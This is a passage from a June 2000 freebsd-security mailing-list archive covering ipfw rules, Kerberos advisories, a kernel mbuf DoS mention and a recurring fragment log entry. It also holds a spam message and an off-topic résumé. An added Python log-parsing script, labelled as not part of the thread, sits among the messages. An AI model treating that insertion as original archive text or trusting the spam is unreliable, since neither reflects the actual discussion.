Big deal. So what do we do about it? Implement per-process mbuf usage limits? Eww.

-- 
Bruce M. Simpson aka 'udp'
Security Analyst & UNIX Development Engineer
WWW: www.closed-networks.com/~udp          Dundee
     www.packetfactory.net/~udp            United Kingdom
email: udp@closed-networks.com

From owner-freebsd-security Wed Jun 14 9:41:30 2000
Date: Wed, 14 Jun 2000 09:40:46 -0700 (PDT)
From: dima@rdy.com (Dima Ruban)
Reply-To: dima@rdy.com
Organization: HackerDome
Message-Id: <200006141640.JAA21477@sivka.rdy.com>
In-Reply-To: "from Randy Bush at Jun 12, 2000 10:44:02 pm"
To: Randy Bush
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: netscape and /etc/pwd.db

Randy Bush writes:
> oddity from logs.
> 
> Jun 11 10:48:22 foux navigator-4.73.us.bin: /etc/pwd.db: Invalid argument
> Jun 11 10:54:39 foux navigator-4.73.us.bin: /etc/pwd.db: Invalid argument
> 
> i was not on the same continent as my workstation when this was logged. any
> hints?

It happens either when you attempt to start second netscape, or previous netscape session crashed and there's still a lock file for it.
> 
> randy

-- 
dima

From owner-freebsd-security Wed Jun 14 11:37: 0 2000
Date: Wed, 14 Jun 2000 20:41:07 +0200
From: Bart van Leeuwen
Reply-To: bart@ixori.demon.nl
Organization: IxorI
Message-ID: <3947D1C3.517223F3@ixori.demon.nl>
To: Gabor Zahemszky
Cc: freebsd-security@freebsd.org
Subject: Re: rc.network firewall init
References: <20000614171130.E471@zg.CoDe.hu>

Gabor Zahemszky wrote:
> 1) Well, in 4.x ipfw _is_ stateful, but as a new feature, maybe not so
> many people use it.

While true, this still leaves a short window during which communications are possible. This window is only really closed after all deny/reject/icmp unreach/reset rules have been loaded (or at least a deny all from any to any is added at the end) and will be 'open' again during flush/reload. On a 486 or small pentium system that can be quite a bit more than a fraction of a second.

default to accept is imho simply not suitable for a setup where such a window might be an issue. This is regardless of using a kld or not.
> 2) This problem exists, if somebody is using the other firewall, ipf,
> as its default actions are pass (yes, we can change it with that
> non-documented option)
> options IPFILTER_DEFAULT_BLOCK #kernel ipfilter default block

Well... wouldn't documenting the feature fix that? ;-) It is useful enough I'd think..

> Conclusion: don't use a KLD firewall! (or maybe somebody will restructure
> our rc.network script, and put in those changes, which will make it easier
> to use ipf instead of ipfw.)

Nah, just load it from /boot/loader.conf
Add a line like:

    ipfw_load="YES"

and it will be loaded and active even before init runs. Still won't help a thing with default to accept tho.

On another note, I never saw the point of using a kld when ipfw is used for security purposes, but that might just be me. The only reason I can think of is being able to boot the machine to single user mode without ipfw support, but I never encountered a situation where I might want to do that ;-)

Oh well, and of course someone might want to do this in order to not have to compile a new kernel... well... the time it takes to build that kernel is likely to be very short when compared to the time it takes to create a decent ipfw ruleset, and well worth the effort I think.
-- 
Bart van Leeuwen
-----------------------------------------------------------
mailto:bart@ixori.demon.nl  -  http://www.ixori.demon.nl/
-----------------------------------------------------------

From owner-freebsd-security Wed Jun 14 12:30:46 2000
Date: Wed, 14 Jun 2000 12:33:49 -0400 (EDT)
From: Garrett Wollman
Message-Id: <200006141633.MAA03515@khavrinen.lcs.mit.edu>
To: Tushar Patel
Cc: Cy.Schubert@uumail.gov.bc.ca, freebsd-security@FreeBSD.ORG
Subject: Re: Kerberos for POP, radius, ftp etc
In-Reply-To: <200006141451.JAA08402@ecpi.com>
References: <200006141417.e5EEHi431392@cwsys.cwsent.com> <200006141451.JAA08402@ecpi.com>

< said:

> So, how do people change the authentication process to kerberos without
> involving the end user?

Most places use a registration procedure. For example, in the Athena Computing Environment, there are registration servers which have write access to the Kerberos KDC; new users log in using a special account and prove their identity using an out-of-band mechanism. (We don't do anything like that here at LCS.)

One of the hacks that used to run here went in the opposite direction: if a user was able to authenticate with Kerberos, their local password would be changed automatically to be the same as their Kerberos password.
-GAWollman

From owner-freebsd-security Wed Jun 14 13:35:18 2000
From: Boris Karnaukh
Date: Wed, 14 Jun 2000 13:46:44 +0300
To: Hugh Ho, freebsd-security@freebsd.org
Subject: Re: IPFW rules for DNS?
Message-ID: <39476294.5A2D178D@iname.com>
References: <20000613014237.10942.qmail@web210.mail.yahoo.com>

Hugh Ho wrote:
>
> I need to do nslookup quite often, and I have the following IPFW rules which
> allow nslookup to talk to my ISP's DNS server:
>
> allow udp from ${my_ip} to ${dns_server} 53
> allow udp from ${dns_server} 53 to ${my_ip}
>
> Problem with the above rules is that people can pass IPFW if they use UDP port
> 53 with a spoofed IP that matches my ISP's DNS server. Is there a way to fix my
> problem?

You can try to implement keep-state/check-state in your ruleset.

    check-state
    allow udp from ${my_ip} to ${dns_server} 53 keep-state

I think that approach can shorten the period of time when your computer
is open to udp traffic from outside.
Thus you'll be not so vulnerable to an incoming stream of spoofed DNS
replies.

--
Boris Karnaukh (mailto:bk532@iname.com)

From owner-freebsd-security Wed Jun 14 19:20:51 2000
From: Peeter Pirn
Date: Wed, 14 Jun 2000 21:22:10 -0500
To: George.Giles@mcmail.vanderbilt.edu
Cc: freebsd-security@freebsd.org
Subject: Re: netbios
Message-ID: <20000614212210.A1854@rhubarb.fwi.com>
In-Reply-To: <862568FD.0046A112.00@MCSMTP.MC.VANDERBILT.EDU>

See attached file.

On Tue, Jun 13, 2000 at 07:58:30AM -0500, George.Giles@mcmail.vanderbilt.edu wrote:
>
>
> I have closed all ports except 21, 22 using ipfw. I find on scanning a port 139
> open called NETBIOS. How do I close?

--
Peeter Pirn - peeter@rhubarb.fwi.com

[attachment: fw]

In the rules below, I have taken my `allow' firewall rules that allow
Samba to run on my internal network and changed them to `deny'. This
should block some, if not all, NETBIOS packets. Note that the first rule
applies to incoming packets for the broadcast address, not the address
of the interface.
    #
    # Deny NETBIOS from internal network.  Will block Samba communications.
    #
    /sbin/ipfw add 30100 deny log udp from 10.0.0.0/24 137 to 10.0.0.255 137 via 10.0.0.254
    /sbin/ipfw add 30110 deny log udp from 10.0.0.254 137 to 10.0.0.1/24 137 via 10.0.0.254
    /sbin/ipfw add 30200 deny log udp from 10.0.0.254 138 to 10.0.0.0/24 138 via 10.0.0.254
    /sbin/ipfw add 30300 deny log tcp from 10.0.0.1/24 to 10.0.0.254 139 via 10.0.0.254
    /sbin/ipfw add 30310 deny log tcp from 10.0.0.254 139 to 10.0.0.1/24 via 10.0.0.254

From owner-freebsd-security Wed Jun 14 21:46:15 2000
From: Mike Silbersack
Date: Wed, 14 Jun 2000 23:45:59 -0500 (CDT)
To: freebsd-security@freebsd.org
Subject: Re: Local FreeBSD, Openbsd, NetBSD, DoS Vulnerability - Mac OS X affected
In-Reply-To: <20000614174706.F78775@closed-networks.com>

On Wed, 14 Jun 2000, User Datagram Protocol wrote:

> Eww. What a lame DoS attack.
>
> On Wed, Aug 02, 2000 at 08:41:53AM -0300, Ussr Labs wrote:
> > an unprivileged user can panic the kernel. Quick and dirty testing
>
> > ...
>
> Big deal. So what do we do about it? Implement per-process mbuf usage limits?
> Eww.

Good news.
Jonathan Lemon committed the mbuf wait MFC to the 3 branch a few days
ago, so we can now simply tell people to cvsup if they're worried about
someone trying a mbuf exhaustion on them. (Granted, the handling of such
an attack isn't perfect for all cases, but the panic is gone.)

Mike "Silby" Silbersack

From owner-freebsd-security Thu Jun 15 06:51:00 2000
From: "Andrew J. Korty"
Date: Thu, 15 Jun 2000 08:50:50 -0500 (EST)
To: freebsd-security@freebsd.org
Subject: Kerberos IV DoS

Have the effects of CERT Advisory CA-2000-11 on FreeBSD been addressed?
Our version of Kerberos IV should not be affected, but the MIT advisory at

    http://web.mit.edu/kerberos/www/advisories/krb4kdc.txt

states that Kerberos V vulnerability depends on the underlying malloc()
implementation.

--
Andrew J. Korty, Lead Security Engineer
Office of the Vice President for Information Technology
Indiana University

From owner-freebsd-security Thu Jun 15 07:55:38 2000
From: Cy Schubert - ITSD Open Systems Group
Date: Thu, 15 Jun 2000 07:53:49 -0700
To: "Andrew J. Korty"
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Kerberos IV DoS
Message-Id: <200006151454.e5FEsF463079@cwsys.cwsent.com>
In-reply-to: Your message of "Thu, 15 Jun 2000 08:50:50 CDT."

In message , "Andrew J. Korty" writes:
> Have the effects of CERT Advisory CA-2000-11 on FreeBSD been
> addressed?
> Our version of Kerberos IV should not be affected,
> but the MIT advisory at
>
> http://web.mit.edu/kerberos/www/advisories/krb4kdc.txt
>
> states that Kerberos V vulnerability depends on the underlying
> malloc() implementation.

The Heimdal version of Kerberos V that's in the FreeBSD base is not
affected. The krb5 port in the ports collection is affected. I've
submitted a PR this morning to address this and the GSSFTP vulnerability
patch released by MIT yesterday. The PR number is ports/19301.

Regards,                        Phone:  (250)387-8437
Cy Schubert                     Fax:    (250)387-5766
Team Leader, Sun/DEC Team       Internet:  Cy.Schubert@osg.gov.bc.ca
Open Systems Group, ITSD, ISTA
Province of BC

From owner-freebsd-security Thu Jun 15 10:45:26 2000
From: prettylady@freemail.ru (envelope sender; header address stripped)
Date: Thu, 15 Jun 2000 20:43:24 +0400
Message-ID: <14353557731401516@d135.p6.col.ru>
Subject: Hi, its for you !

Hi! We are Russian girls - Natali, Alla, Vika. We would like to
correspond with you. Visit our site and see our photos.

http://www.russiangirls.narod.ru/

With interest, Natali, Alla, Vika.

P.S. (This is not spam. You can unsubscribe at any time by sending an
email to prettylady@freemail.ru with the subject UNSUBSCRIBE.)
From owner-freebsd-security Fri Jun 16 06:04:24 2000
From: Lowell Gilbert
Date: 16 Jun 2000 09:04:01 -0400
To: John F Cuzzola, freebsd-security@freebsd.org
Subject: Re: ipfw log entry
In-Reply-To: John F Cuzzola's message of Tue, 13 Jun 2000 16:25:04 -0700 (PDT)

Well, no one else has spoken up, so I'm taking a shot at it.

John F Cuzzola writes:

> Hi everyone,
> On one of our firewalls numerous entries looking like this were logged:
>
> ipfw: -1 Refuse TCP 209.1.224.16 107.13.119.32 in via ep3 Fragment = 147
>
>
> I haven't seen this one before. Is this a packet that FreeBSD explicitly
> blocks regardless of the firewall rules and if so what is its
> intent/purpose? (Basically what I'm asking is does this look like hacker
> activity).

Without looking at the code, it's hard to say what's happening here.
ipfw_report() is getting called with no rule associated. The only
case the documentation mentions that might be related is the "always
discard" situation of a frag with an offset of one. This packet,
though, has a fragment of 147 (slightly larger than the required
minimum packet size that any IP device has to be able to handle), so
nothing being reported sounds illegitimate.
If I had to hazard a guess, I'd say this sounds like a bug in how the
reporting routine gets called from somewhere. The only place this
could get called from without the associated rule is the bogusfrag
label in ip_fw.c. Aside from fragment offsets of one, there's a
PULLUP_TO() macro that jumps there. I don't really know BSD mbufs
that well, but it looks like the situation being detected is a frame
shorter than the IP length.

If I'm right, this is very unlikely to be hacker activity. In fact,
the situation being detected has to originate on your local wire. I
may be wrong, though, because I thought that kind of error should get
picked up as an input error on the interface.

If we're lucky, Luigi will speak up to tell us whether I'm completely
insane.

Be well.
Lowell Gilbert

From owner-freebsd-security Fri Jun 16 11:41:05 2000
From: Hugh Ho
Date: Fri, 16 Jun 2000 11:41:01 -0700 (PDT)
To: freebsd-security@FreeBSD.ORG
Subject: RE: IPFW rules for DNS?
Message-ID: <20000616184101.16099.qmail@web209.mail.yahoo.com>

Thank everyone who gave me advice.

-Hugh

__________________________________________________
Do You Yahoo!?
Send instant messages with Yahoo! Messenger.
http://im.yahoo.com/

From owner-freebsd-security Fri Jun 16 12:14:36 2000
From: Ian Smith
Date: Sat, 17 Jun 2000 05:14:07 +1000 (EST)
To: Lowell Gilbert
Cc: John F Cuzzola, freebsd-security@FreeBSD.ORG
Subject: Re: ipfw log entry

On 16 Jun 2000, Lowell Gilbert wrote:

> Well, no one else has spoken up, so I'm taking a shot at it.
>
> John F Cuzzola writes:
>
> > Hi everyone,
> > On one of our firewalls numerous entries looking like this were logged:
> >
> > ipfw: -1 Refuse TCP 209.1.224.16 107.13.119.32 in via ep3 Fragment = 147
> >
> >
> > I haven't seen this one before. Is this a packet that FreeBSD explicitly
> > blocks regardless of the firewall rules and if so what is its
> > intent/purpose? (Basically what I'm asking is does this look like hacker
> > activity).
>
> Without looking at the code, it's hard to say what's happening here.
> ipfw_report() is getting called with no rule associated. The only
> case the documentation mentions that might be related is the "always
> discard" situation of a frag with an offset of one. This packet,
> though, has a fragment of 147 (slightly larger than the required
> minimum packet size that any IP device has to be able to handle), so
> nothing being reported sounds illegitimate.
As I mentioned to John, this host is res6.geocities.com. We see these
here usually in big batches, perhaps about once a month on average, eg:

May 22 18:14:39 gaia /kernel:
 ipfw: 65000 Count TCP 209.1.224.16 203.41.52.xxx in via tun0 Fragment = 147

Rule 65000 is 'count log tcp from any to any in', one of some counts by
protocol before being silently denied by 65535, deny ip from any to any.
65000 usually only logs non-established, non-setup TCP packets. I'm not
sure whether all traffic from that site suffers this fate or just chunks
of it. Note, no TCP port numbers were specified, or logged at any rate.

[.. speculation on likely causes in the ipfw code blissfully ignored ..]

> If I'm right, this is very unlikely to be hacker activity. In fact,
> the situation being detected has to originate on your local wire. I
> may be wrong, though, because I thought that kind of error should get
> picked up as an input error on the interface.

Don't think it's any 'activity' either, more likely something broken at
res6.geocities.com. Noticed another site occasionally w/fragment = 184.
Haven't asked these (dialup) folks what wasn't working for them, as they
seem also skilled at finding perhaps related sites, hoping to establish
http connections with URLs from nets 10/8, 172.16/12 and 192.168/16 :-)

> If we're lucky, Luigi will speak up to tell us whether I'm completely
> insane.
That would be comforting I'm sure :-)

Cheers, Ian

From owner-freebsd-security Fri Jun 16 12:32:52 2000
From: Bart van Leeuwen
Date: Fri, 16 Jun 2000 21:36:38 +0200 (CEST)
To: Lowell Gilbert
Cc: John F Cuzzola, freebsd-security@freebsd.org
Subject: Re: ipfw log entry

On 16 Jun 2000, Lowell Gilbert wrote:

> Well, no one else has spoken up, so I'm taking a shot at it.
>
> John F Cuzzola writes:
>
> > Hi everyone,
> > On one of our firewalls numerous entries looking like this were logged:
> >
> > ipfw: -1 Refuse TCP 209.1.224.16 107.13.119.32 in via ep3 Fragment = 147
> >
> >
> > I haven't seen this one before. Is this a packet that FreeBSD explicitly
> > blocks regardless of the firewall rules and if so what is its
> > intent/purpose? (Basically what I'm asking is does this look like hacker
> > activity).
>
> Without looking at the code, it's hard to say what's happening here.
> ipfw_report() is getting called with no rule associated. The only
> case the documentation mentions that might be related is the "always
> discard" situation of a frag with an offset of one.
> This packet,
> though, has a fragment of 147 (slightly larger than the required
> minimum packet size that any IP device has to be able to handle), so
> nothing being reported sounds illegitimate.
>
> If I had to hazard a guess, I'd say this sounds like a bug in how the
> reporting routine gets called from somewhere. The only place this
> could get called from without the associated rule is the bogusfrag
> label in ip_fw.c. Aside from fragment offsets of one, there's a
> PULLUP_TO() macro that jumps there. I don't really know BSD mbufs
> that well, but it looks like the situation being detected is a frame
> shorter than the IP length.
>
> If I'm right, this is very unlikely to be hacker activity. In fact,
> the situation being detected has to originate on your local wire. I
> may be wrong, though, because I thought that kind of error should get
> picked up as an input error on the interface.

Well, I'm far from an expert on mbufs, but a quick peek at the code
suggests that the other way to get such a log entry would be if
allocating an mbuf fails in m_pullup. In that case I'd think it's a
tuning matter. I can imagine that this happens when receiving a lot of
fragments before the packet can be reassembled or when the firewall
machine gets a huge amount of packets to handle in general. If I
remember correctly man dummynet suggests that you might need more mbufs
because of dummynet and using ipfw.

>
> If we're lucky, Luigi will speak up to tell us whether I'm completely
> insane.

Heh.. I won't comment on that ;-) tho... maybe Luigi can tell me if I'm
insane as well.. have been wondering for years ;-)

Bart.
From owner-freebsd-security Fri Jun 16 13:22:15 2000
From: Mike Tancsa
Date: Fri, 16 Jun 2000 16:18:18 -0400
To: Ian Smith
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: ipfw log entry
Message-Id: <3.0.5.32.20000616161818.0284a960@marble.sentex.ca>

At 05:14 AM 6/17/00 +1000, Ian Smith wrote:
>As I mentioned to John, this host is res6.geocities.com. We see these
>here usually in big batches, perhaps about once a month on average, eg:
>
>May 22 18:14:39 gaia /kernel:
> ipfw: 65000 Count TCP 209.1.224.16 203.41.52.xxx in via tun0 Fragment = 147

I thought I recognized that IP address...

ipfw: -1 Refuse TCP 209.1.224.16 206.130.91.146 in via fxp2 Fragment = 147
ipfw: -1 Refuse TCP 209.1.224.16 206.130.91.146 in via fxp2 Fragment = 147

Sheesh! We see lots of this in our logs as well.
---Mike
------------------------------------------------------------------------
Mike Tancsa, tel +1 519 651 3400
Sentex Communications                          mike@sentex.net
Cambridge, Ontario Canada                      www.sentex.net

From owner-freebsd-security Fri Jun 16 14:16:23 2000
From: Chris Dillon
Date: Fri, 16 Jun 2000 16:16:08 -0500 (CDT)
To: Mike Tancsa
Cc: Ian Smith, freebsd-security@FreeBSD.ORG
Subject: Re: ipfw log entry
In-Reply-To: <3.0.5.32.20000616161818.0284a960@marble.sentex.ca>

On Fri, 16 Jun 2000, Mike Tancsa wrote:

> At 05:14 AM 6/17/00 +1000, Ian Smith wrote:
> >As I mentioned to John, this host is res6.geocities.com. We see these
> >here usually in big batches, perhaps about once a month on average, eg:
> >
> >May 22 18:14:39 gaia /kernel:
> > ipfw: 65000 Count TCP 209.1.224.16 203.41.52.xxx in via tun0 Fragment = 147
>
> I thought I recognized that IP address...
>
> ipfw: -1 Refuse TCP 209.1.224.16 206.130.91.146 in via fxp2 Fragment = 147
> ipfw: -1 Refuse TCP 209.1.224.16 206.130.91.146 in via fxp2 Fragment = 147
>
> Sheesh! We see lots of this in our logs as well.

Ditto. I get these quite often.
ipfw: -1 Refuse TCP 209.1.224.16 207.160.214.253 in via fxp7 Fragment = 147
ipfw: -1 Refuse TCP 209.1.224.16 207.160.214.253 in via fxp7 Fragment = 147
ipfw: -1 Refuse TCP 209.1.224.16 207.160.214.253 in via fxp7 Fragment = 147

Anyone figured out what/who this is yet?

--
Chris Dillon - cdillon@wolves.k12.mo.us - cdillon@inter-linc.net
FreeBSD: The fastest and most stable server OS on the planet.
For Intel x86 and Alpha architectures. ( http://www.freebsd.org )

From owner-freebsd-security Fri Jun 16 14:51:24 2000
From: Brian Somers
Date: Fri, 16 Jun 2000 22:48:02 +0100
To: Chris Dillon
Cc: Mike Tancsa, Ian Smith, freebsd-security@FreeBSD.org, brian@hak.lan.awfulhak.org, luigi@FreeBSD.org
Subject: Re: ipfw log entry
Message-Id: <200006162148.WAA02840@hak.lan.Awfulhak.org>
In-Reply-To: Message from Chris Dillon of "Fri, 16 Jun 2000 16:16:08 CDT."

> On Fri, 16 Jun 2000, Mike Tancsa wrote:
>
> > At 05:14 AM 6/17/00 +1000, Ian Smith wrote:
> > >As I mentioned to John, this host is res6.geocities.com.
> > >We see these
> > >here usually in big batches, perhaps about once a month on average, eg:
> > >
> > >May 22 18:14:39 gaia /kernel:
> > > ipfw: 65000 Count TCP 209.1.224.16 203.41.52.xxx in via tun0 Fragment = 147
> >
> > I thought I recognized that IP address...
> >
> > ipfw: -1 Refuse TCP 209.1.224.16 206.130.91.146 in via fxp2 Fragment = 147
> > ipfw: -1 Refuse TCP 209.1.224.16 206.130.91.146 in via fxp2 Fragment = 147
> >
> > Sheesh! We see lots of this in our logs as well.
>
> Ditto. I get these quite often.
>
> ipfw: -1 Refuse TCP 209.1.224.16 207.160.214.253 in via fxp7 Fragment = 147
> ipfw: -1 Refuse TCP 209.1.224.16 207.160.214.253 in via fxp7 Fragment = 147
> ipfw: -1 Refuse TCP 209.1.224.16 207.160.214.253 in via fxp7 Fragment = 147
>
> Anyone figured out what/who this is yet?

It's a problem in the firewall code - I think because of assumptions
about minimum lengths of packets. I didn't figure this out, but I
talked to luigi@ about it a couple of weeks ago.

> --
> Chris Dillon - cdillon@wolves.k12.mo.us - cdillon@inter-linc.net
> FreeBSD: The fastest and most stable server OS on the planet.
> For Intel x86 and Alpha architectures. ( http://www.freebsd.org )

--
Brian

Don't _EVER_ lose your sense of humour !
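As an added example (not part of the thread), a small Python triage script that parses the ipfw log format quoted above and groups the rule-less (-1) fragment reports by source address and fragment offset, which is the comparison the posters made by hand; the sample log is constructed from the lines quoted in the thread, plus two ordinary rule hits and one unrelated line.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# FreeBSD 4.x ipfw log format as seen in this thread:
#   ipfw: <rule> <action> <proto> <src>[:<sport>] <dst>[:<dport>] in|out via <iface> [Fragment = <off>]
# An optional syslog prefix ("May 22 18:14:39 gaia /kernel: ") may precede it.
# A rule number of -1 means ipfw_report() ran without a matching rule.
IPFW_LOG_RE = re.compile(
    r"^(?:(?P<stamp>[A-Z][a-z]{2}\s+\d{1,2}\s+\d{2}:\d{2}:\d{2})\s+(?P<host>\S+)\s+\S+:\s*)?"
    r"ipfw:\s+(?P<rule>-?\d+)\s+(?P<action>\w+)\s+(?P<proto>\w+)\s+"
    r"(?P<src>[\w.]+)(?::(?P<sport>\d+))?\s+"
    r"(?P<dst>[\w.]+)(?::(?P<dport>\d+))?\s+"
    r"(?P<direction>in|out)\s+via\s+(?P<iface>\S+)"
    r"(?:\s+Fragment\s*=\s*(?P<frag>\d+))?\s*$"
)


@dataclass(frozen=True)
class IpfwEntry:
    rule: int                 # -1 = no rule associated (the case discussed above)
    action: str
    proto: str
    src: str
    sport: Optional[int]
    dst: str
    dport: Optional[int]
    direction: str
    iface: str
    frag: Optional[int]       # IP fragment-offset field as printed by the kernel
    stamp: Optional[str] = None
    host: Optional[str] = None

    def frag_offset_bytes(self) -> Optional[int]:
        """RFC 791 counts the fragment offset in 8-octet units."""
        return None if self.frag is None else self.frag * 8


def parse_line(line: str) -> Optional[IpfwEntry]:
    """Return an IpfwEntry for one log line, or None if it is not an ipfw line."""
    m = IPFW_LOG_RE.match(line.strip())
    if not m:
        return None
    g = m.groupdict()

    def opt_int(v: Optional[str]) -> Optional[int]:
        return int(v) if v is not None else None

    return IpfwEntry(
        rule=int(g["rule"]), action=g["action"], proto=g["proto"],
        src=g["src"], sport=opt_int(g["sport"]),
        dst=g["dst"], dport=opt_int(g["dport"]),
        direction=g["direction"], iface=g["iface"],
        frag=opt_int(g["frag"]), stamp=g["stamp"], host=g["host"],
    )


def parse_log(text: str) -> List[IpfwEntry]:
    """Parse every ipfw line in a syslog extract; unrelated lines are skipped."""
    return [e for e in (parse_line(ln) for ln in text.splitlines()) if e is not None]


def ruleless_fragment_summary(entries: List[IpfwEntry]) -> List[dict]:
    """Group rule -1 fragment reports by (source, fragment offset), busiest first.

    One source hitting several of your hosts with the same offset, as in the
    thread, points at a broken sender or a kernel-side length check rather
    than at targeted activity; many sources or varying offsets would differ.
    """
    groups: Dict[Tuple[str, int], dict] = {}
    for e in entries:
        if e.rule != -1 or e.frag is None:
            continue
        g = groups.setdefault((e.src, e.frag), {"src": e.src, "frag": e.frag,
                                                 "count": 0, "dsts": set(), "ifaces": set()})
        g["count"] += 1
        g["dsts"].add(e.dst)
        g["ifaces"].add(e.iface)
    return [{**g, "dsts": sorted(g["dsts"]), "ifaces": sorted(g["ifaces"])}
            for g in sorted(groups.values(), key=lambda g: -g["count"])]


# Constructed sample: the lines quoted in this thread (Ian Smith's syslog entry
# joined onto one line, as syslog writes it) plus two ordinary rule hits.
SAMPLE_LOG = """\
ipfw: -1 Refuse TCP 209.1.224.16 107.13.119.32 in via ep3 Fragment = 147
May 22 18:14:39 gaia /kernel: ipfw: 65000 Count TCP 209.1.224.16 203.41.52.xxx in via tun0 Fragment = 147
ipfw: -1 Refuse TCP 209.1.224.16 206.130.91.146 in via fxp2 Fragment = 147
ipfw: -1 Refuse TCP 209.1.224.16 206.130.91.146 in via fxp2 Fragment = 147
ipfw: -1 Refuse TCP 209.1.224.16 207.160.214.253 in via fxp7 Fragment = 147
ipfw: 30300 Deny TCP 10.0.0.7:1035 10.0.0.254:139 in via ed0
some unrelated syslog line
ipfw: 65535 Deny UDP 192.0.2.9:53 198.51.100.4:1024 in via fxp0
"""

if __name__ == "__main__":
    for g in ruleless_fragment_summary(parse_log(SAMPLE_LOG)):
        print(f"{g['src']} frag={g['frag']} ({g['frag'] * 8} bytes) x{g['count']} "
              f"to {len(g['dsts'])} host(s) via {', '.join(g['ifaces'])}")
```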
From owner-freebsd-security Sat Jun 17 07:52:25 2000
From: "Jason L. Schwab"
Date: Sat, 17 Jun 2000 08:47:05 -0700
Subject: Resume...
Message-ID: <003801bfd873$4ba66d20$5a54a0d0@jlschwab.simphost.com>

Hello Everyone;

Hi. My name is Jason L. Schwab. How are you doing today?

Well first of all, let me tell you a little about myself. I am 17 years
of age. I am located in Albuquerque, New Mexico, USA. I have just over 5
years of Unix and Linux experience. I am looking to get a lot more
experience in the internet and/or unix servers area. I am looking to do
this by working for an Internet Service Provider.

The list below contains a very small portion of my capabilities.

  - Perl Programming
  - C/C++ Programming
  - HTML Programming
  - CGI Programming
  - Apache (Complete Configuration)
  - DNS / BIND / NAMED Primary/Secondary
  - Mail Servers (postfix/sendmail/qmail)
  - FTP Servers (wuftpd/ncftpd/proftpd/ftpd-bsd)
  - SSH (of course ;))
  - syslogd (logging to outside hosts)
  - Kernels and System Upgrades
  - Security Knowledge (tripwire/kern.securelevel)
  - Firewalls and Networking
  - Windows 95/98 Tech. Support
  - Unix/Linux Tech. Support (*BSD/Linux Only)

There are a lot more items on that list! It's just a small part of my
capabilities, and I am learning more by the day. One of my favorite
hobbies is remote unix administration; I think it's the best job anyone
could ever have, so yes, I am willing to do remote unix administration.
I am looking to do mainly networking and security.

As far as my security knowledge goes, I have been doing unix and linux
security for just over 3 years now. In this time period I have never had
a security problem ever. Just to test my own security knowledge, I
hosted a machine running BSD and I gave out a public account on it. I
emailed every unix and linux security mailing list with the login
information; I had over 500 people trying to breach my security and for
the three months I ran it, no one, not a single person compromised that
machine.

I have worked for an Internet Service Provider before, NMIA.COM, New
Mexico Internet Access, which was strictly temporary employment, which
is why I no longer work there. I was doing Client Firewalling, Unix
Programming and a lot of misc. tasks.

I consider myself a professional unix system administrator. I have run
two small web hosting companies for friends of mine, and I have helped
administrate a total of about 10 small web hosting and unix shell
account servers worldwide. So I have a wide range of experience within
the unix and linux area.

Sincerely,
Jason L. Schwab - jlschwab@uswest.net
From owner-freebsd-security Sat Jun 17 10: 6: 5 2000
Delivered-To: freebsd-security@freebsd.org
Received: from earth.wnm.net (earth.wnm.net [208.246.240.243]) by hub.freebsd.org (Postfix) with ESMTP id 4032E37B5C6; Sat, 17 Jun 2000 10:06:02 -0700 (PDT) (envelope-from alex@wnm.net)
Received: from localhost (alex@localhost) by earth.wnm.net (8.11.0.Beta1/8.11.0.Beta1) with ESMTP id e5HH8QY83097; Sat, 17 Jun 2000 12:08:26 -0500 (CDT)
Date: Sat, 17 Jun 2000 12:08:26 -0500 (CDT)
From: Alex Charalabidis
To: "Jason L. Schwab"
Cc: freebsd-isp@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Subject: Re: Resume...
In-Reply-To: <003801bfd873$4ba66d20$5a54a0d0@jlschwab.simphost.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Sat, 17 Jun 2000, Jason L. Schwab wrote:

> Hello Everyone;
>
> Hi. My name is Jason L. Schwab. How are you doing today?
>

For all your supposed professional skills, you are not capable of posting to an appropriate mailing list... Go read the list of FreeBSD mailing lists again and notice how there is one that suits the purpose.
-ac

--
==============================================================
Alex Charalabidis (AC8139)        5050 Poplar Ave, Ste 170
Systems Administrator             Memphis, TN 38157
WebNet Memphis                    (901) 432 6000
Author, The Book of IRC           http://www.bookofirc.com/
==============================================================

From owner-freebsd-security Sat Jun 17 10:48:13 2000
Delivered-To: freebsd-security@freebsd.org
Received: from stingray.ivision.co.uk (avengers.ivision.co.uk [212.25.224.7]) by hub.freebsd.org (Postfix) with ESMTP id 01F6837B64F; Sat, 17 Jun 2000 10:48:09 -0700 (PDT) (envelope-from manar@ivision.co.uk)
Received: from [212.25.224.17] (helo=pretender2) by stingray.ivision.co.uk with smtp (Exim 2.04 #1) id 133MhD-000285-00; Sat, 17 Jun 2000 18:47:51 +0100
Message-Id: <3.0.5.32.20000617184621.026e2cd0@stingray.ivision.co.uk>
X-Sender: manarpop@stingray.ivision.co.uk
X-Mailer: QUALCOMM Windows Eudora Pro Version 3.0.5 (32)
Date: Sat, 17 Jun 2000 18:46:21 +0100
To: freebsd-isp@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
From: Manar Hussain
Subject: Re: Resume...
In-Reply-To:
References: <003801bfd873$4ba66d20$5a54a0d0@jlschwab.simphost.com>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

>> Hi. My name is Jason L. Schwab. How are you doing today?
>>
>For all your supposed professional skills, you are not capable of posting
>to an appropriate mailing list... Go read the list of FreeBSD mailing
>lists again and notice how there is one that suits the purpose.

I'm sure this is unfair, but I have to say that the cluelessness of sending it to -isp and -security rather than -jobs made me immediately wonder if it was a scam. I mean, what better way to gain access to someone's network / systems than to have them explain it to you and give you root :).
Manar

--
Manar Hussain, Director           Email: manar@ivision.co.uk
Mobile: (07971) 277821
Internet Vision                   Tel: 020 7589 4500
60 Albert Court                   Fax: 020 7589 4522
Prince Consort Road               info@ivision.co.uk
London. SW7 2BE                   http://www.ivision.co.uk/